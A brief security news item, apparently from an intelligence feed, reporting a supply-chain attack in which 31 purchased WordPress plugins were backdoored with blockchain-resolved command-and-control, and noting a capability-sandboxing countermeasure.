WordPress: 31 Plugins Backdoored via Flippa Acquisition

Attacker legally purchased 31 WordPress plugins on Flippa, inserted a dormant backdoor activated 8 months later, routing C2 through an Ethereum smart contract to resist DNS-level takedown.

1 min read|agenticonsult Intelligence

WordPress: 31 Plugins Backdoored via Flippa Acquisition

An attacker legally purchased 31 WordPress plugins on Flippa, inserted a dormant backdoor, and waited 8 months before activating it. The command-and-control domain was resolved through an Ethereum smart contract — making the C2 layer blockchain-mutable and resistant to standard DNS-level takedown. Because plugins run with full database and filesystem access by default, activation gave the attacker unrestricted host access across all affected sites. 96% of recent WordPress CVEs trace to plugins.

Why It Matters

No CVE can prevent a legitimate acquisition. Plugin-trust models based on marketplace reputation cannot defend against this class of dormant supply-chain attack. Cloudflare's new MIT-licensed Mdash project responds with per-plugin manifest-declared capability sandboxing — the structural countermeasure the WordPress architecture lacks.

Primary source

Fireship

This breaking-news item was assembled from the cited primary source with AI assistance. It is intended for rapid situational awareness — refer to the original publication for the definitive statement.

WordPress: 31 Plugins Backdoored via Flippa Acquisition

WordPress: 31 Plugins Backdoored via Flippa Acquisition

Why It Matters

Live Intel Feed